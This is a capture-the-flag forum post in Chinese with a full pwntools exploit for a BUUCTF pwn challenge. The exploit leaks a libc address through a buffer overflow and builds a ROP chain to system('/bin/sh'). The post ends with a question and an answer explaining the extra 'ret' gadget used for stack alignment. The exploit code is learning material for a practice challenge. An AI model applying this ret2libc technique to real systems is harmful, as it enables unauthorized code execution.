原题地址:BUUCTF在线评测 (buuoj.cn)
这里是exp
from os import popen
from pwn import *
from LibcSearcher import *
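context.log_level = 'debug'

# Target selection: `python exp.py REMOTE` (pwntools `args`) talks to the
# challenge server; the default spawns the local binary for debugging.
if args.REMOTE:
    p = remote('node4.buuoj.cn', 28554)
else:
    p = process('./pwn')

e = ELF("./pwn")
puts_plt_addr = e.plt['puts']
puts_got_addr = e.got['puts']   # alternative leak target; any already-resolved GOT entry works
gets_got_addr = e.got['gets']
encrypt_addr = 0x4009a0         # re-enter the vulnerable function for a second gets() overflow
pop_rdi = 0x0000000000400c83    # pop rdi ; ret
ret = 0x4006b9                  # bare ret: advances rsp by 8 and touches nothing else

# ---- Stage 1: leak gets@GOT ---------------------------------------------------
# 88 bytes = the 0x50-byte stack buffer plus the saved rbp; the return address
# follows.  The chain calls puts(gets@GOT) and then jumps back into encrypt()
# so we get a second gets() overflow with the leaked libc address in hand.
p.recvuntil(b"choice!\n")
p.sendline(b"1")
payload = b'a' * 88 + p64(pop_rdi) + p64(gets_got_addr) + p64(puts_plt_addr) + p64(encrypt_addr)
p.sendline(payload)

# encrypt() transforms the buffer in place before echoing it ('a' comes back as
# 'l'), so the echoed line starts with 88 'l'.  The echo then continues with the
# three non-NUL bytes of pop_rdi (0x83 0x0c 0x40 -- outside the ranges encrypt
# rewrites) and stops at its NUL, after which puts() appends '\n': 4 bytes total.
p.recvuntil(b"l" * 88)
p.recvn(4)

# puts(gets@GOT) writes the 6 significant bytes of a user-space pointer and stops
# at the first NUL (byte 7 of an 0x7f.... address).  Read exactly six bytes rather
# than splitting on '\n': an address containing 0x0a would otherwise be truncated.
gets_addr = u64(p.recvn(6).ljust(8, b"\x00"))
log.info("gets@libc = %#x", gets_addr)

# Wait for the second encrypt() prompt before sending the next overflow.
p.recvuntil(b"Input your Plaintext to be encrypted")

# ---- libc resolution -----------------------------------------------------------
# With the challenge's libc available, take the offsets from it directly.
# Without it, LibcSearcher can identify the libc from the leaked gets() address:
#   libc = LibcSearcher("gets", gets_addr)
#   libc_base = gets_addr - libc.dump('gets')
#   system_addr = libc_base + libc.dump("system")
#   bin_addr = libc_base + libc.dump("str_bin_sh")
libc = ELF("./libc.so")
libc_base = gets_addr - libc.symbols['gets']
system_addr = libc_base + libc.symbols["system"]
bin_addr = libc_base + next(libc.search(b"/bin/sh"))

# A mis-parsed leak or a libc that does not match the target shows up here as a
# non-page-aligned base; fail loudly now instead of crashing inside system().
if libc_base & 0xfff:
    log.error("libc base %#x is not page aligned -- wrong libc or bad leak", libc_base)
log.info("libc base = %#x, system = %#x, /bin/sh = %#x", libc_base, system_addr, bin_addr)

# ---- Stage 2: system("/bin/sh") ---------------------------------------------------
# The leading `ret` is the "stack alignment" gadget: the x86-64 SysV ABI requires
# rsp to be 16-byte aligned at a `call`, and system() on recent glibc executes a
# movaps on stack memory that faults when rsp is off by 8.  After this overflow the
# chain lands in system() misaligned, and a bare ret fixes that by consuming one
# 8-byte slot without modifying any register.  Drop it if the target is already
# aligned (system crashes in one configuration and works in the other).
#
# Keep the first gadget a binary address (0x40....): encrypt() presumably only
# rewrites bytes up to the first NUL (it is strlen-bounded in the reversed code
# -- confirm in the binary), so the NUL high bytes of `ret` shield the libc
# addresses behind it from being transformed.
payload = b'a' * 88 + p64(ret) + p64(pop_rdi) + p64(bin_addr) + p64(system_addr)
p.sendline(payload)
p.interactive()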
我看其他wp发现最后一个payload里添加了p64(ret),并说明为栈平衡
看了一天不懂为什么需要栈平衡,而且为什么要用ret指令平衡,求助
roger已获得悬赏 1 荣耀+5 学币最佳答案
这里说的"栈平衡"其实是 x86-64 System V ABI 的对齐要求:执行 call 指令之前 rsp 必须按 16 字节对齐。system() 内部(较新版本的 glibc,如 2.27 及以后)会用 movaps 这类指令访问栈上数据,如果通过 ROP 进入 system 时 rsp 只对齐到 8 字节,movaps 就会触发 SIGSEGV,拿不到 shell。ROP 链里的 ret 指令只做一件事:把 rsp 加 8 后跳转,不改任何寄存器、不碰内存,所以在链前面多放一个 ret 正好把 rsp 向后推 8 字节,修正这个错位;反过来,如果目标本来就对齐,加了 ret 反而会崩,删掉即可。用 ret 是因为它最容易找到(任何函数结尾都有),原则上任何能把 rsp 调整 8 字节且没有副作用的 gadget 都可以起同样的作用。